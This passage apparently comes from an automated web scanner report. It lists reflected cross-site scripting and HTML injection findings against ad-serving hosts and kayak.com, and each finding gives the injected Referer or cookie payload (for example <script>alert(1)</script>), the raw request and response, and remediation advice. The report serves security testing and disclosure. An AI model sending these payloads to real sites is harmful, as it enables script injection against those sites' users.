Expires: Tue, 01 Nov 2011 04:17:36 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 18448

var LJT_AdChoices = {
   img1: 'http://www.lijit.com/___lok_a16/res/images/adchoices/adChoicesSmall_icon.png',
   img2: 'http://www.lijit.com/___lok_a16/res/images/adchoices/adChoicesBig_icon.png',
   enabl
...[SNIP]...
ime String', e);
       return "00:00:00";
   }
}

try{
   // Settings: Change these values on a per user basis
   var lwp_ad_username = "phytomedia";
   var lwp_ad_zoneid = ljt_getZoneID();
   var lwp_ad_numads = "1cacd3";alert(1)//56c2717715";
   var lwp_ad_premium = "1";// or 0 for non-premium ad
   var lwp_ad_eleid = "lijit_region_129604";
   var lwp_method = "regex";
   var lwp_referring_search = getReferringSearch(document.referrer);
   
   var l
...[SNIP]...

3.74. http://adnxs.revsci.net/imp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74ba8'-alert(1)-'95877a0866b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x90&s=1889588&r=1&_salt=501357491&u=http%3A%2F%2Fwww.politico.com%2Findex.html HTTP/1.1
Host: adnxs.revsci.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=74ba8'-alert(1)-'95877a0866b
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:44:01 GMT
Content-Length: 514

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90&referrer=http://www.google.com/search%3Fhl=en%26q=74ba8'-alert(1)-'95877a0866b&inv_code=1889588&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D1889588%26r%3D1%26_salt%3D501357491%26u%3Dhttp%253A%252F%252Fwww.politic
...[SNIP]...

3.75. http://adserving.cpxinteractive.com/st [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9db9'-alert(1)-'15554cd81fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=300x250&section=1921728&referrer=http://www.politico.com/index.html HTTP/1.1
Host: adserving.cpxinteractive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=f9db9'-alert(1)-'15554cd81fa

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:43:45 GMT
Content-Length: 417

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=300x250&inv_code=1921728&referrer=http://www.google.com/search%3Fhl=en%26q=f9db9'-alert(1)-'15554cd81fa&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x250%26section%3D1921728%26referrer%3Dhttp%3A%2F%2Fwww.politico.com%2Findex.htm
...[SNIP]...

3.76. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/ads.pointroll.com/10794/184979/PortalServe/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5405a"-alert(1)-"7d57fc3ef98 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1
Host: fw.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=5405a"-alert(1)-"7d57fc3ef98

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5C6102E2F6A83F9DB553F50477F682D3; Path=/
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:32:00 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.google.com/search?hl=en&q=5405a"-alert(1)-"7d57fc3ef98",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/20
...[SNIP]...

3.77. http://www.kayak.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kayak.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 9bdd6<script>alert(1)</script>f18eed8b017 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.kayak.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=9bdd6<script>alert(1)</script>f18eed8b017

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-UA-Compatible: IE=8
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Content-Length: 70370
Date: Mon, 31 Oct 2011 19:05:35 GMT
Connection: close
Set-Cookie: dc=dc1; Path=/
Set-Cookie: cluster=2; Path=/
Set-Cookie: NSC_q2-tqbslmf=ffffffff09172a1245525d5f4f58455e445a4a422a59;Version=1;Max-Age=1200;path=/;httponly
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Cache-Control: pre-check=0, post-check=0
Expires: 0

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Copyright 2004-2010 Kayak Software Corp, All Rights Reserved.
...[SNIP]...
<b>"9bdd6<script>alert(1)</script>f18eed8b017"</b>
...[SNIP]...

3.78. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1 [AA002 cookie]

Summary

Severity:   Information
Confidence:   Firm
Host:   http://view.atdmt.com
Path:   /iaction/adoapn_AppNexusDemoActionTag_1

Issue detail

The value of the AA002 cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aee9c"><a>587f12fdd92 was submitted in the AA002 cookie. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /iaction/adoapn_AppNexusDemoActionTag_1 HTTP/1.1
Host: view.atdmt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://teamsupport.com/
Cookie: AA002=1311365777-4076437aee9c"><a>587f12fdd92; MUID=360F843730F542A7A6E2E0ACB7BADB9D; ach00=e2ff/25d1:233cf/25d1:ceda/2b2a4:66c2/2b2a3:66c2/2b393:66c2/2b2a2:f594/1c01f:bab9/2b2a4:bab9/2b2a3; ach01=d518598/25d1/145a59c2/e2ff/4e3f43a9:d75a0d4/25d1/13ed2747/233cf/4e496158:d3ff520/2b2a4/13cf9a34/ceda/4e6039d7:d4250f2/2b2a3/13d2744e/66c2/4e603a12:d4250a3/2b2a3/13d274ac/66c2/4e90e866:dff8d3d/2b393/14ee73cc/66c2/4e90e867:e2b4cbd/2b2a2/14fafa61/66c2/4e90ead1:421378c/1c01f/825b020/f594/4e95bdf7:d823c65/1c01f/152e108f/f594/4e95bfbe:421378c/1c01f/88b46cd/f594/4e95bfc0:421378c/1c01f/88b65cd/f594/4e95bfc5:421378c/1c01f/825b022/f594/4e95bfc9:e6bc369/2b2a4/155fd88a/bab9/4ea6f54a:d6a0d6a/2b2a3/14043308/bab9/4eab26d6; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1; TOptOut=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Mon, 31 Oct 2011 19:39:32 GMT
Connection: close
Content-Length: 462

<html><body><img src="http://spe.atdmt.com/images/pixel.gif" width="1" height="1" border="0" /><img src="http://ib.adnxs.com/pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1311365777-4076437aee9c"><a>587f12fdd92%7cMUID%3d360f843730f542a7a6e2e0acb7badb9d%7cTOptOut%3d1%7cEANON%3dA%253d0224022A5O_v0CQzF-naqiaQt73_Qf0-QjKAV1tfjaMwwCPMYNGtztcYxy6VioBxU4ZdU0S0rmIMhKDxkcOtgAUHwPSR9%2526E%253dFFF%2526W%253d1%22);" wi
...[SNIP]...
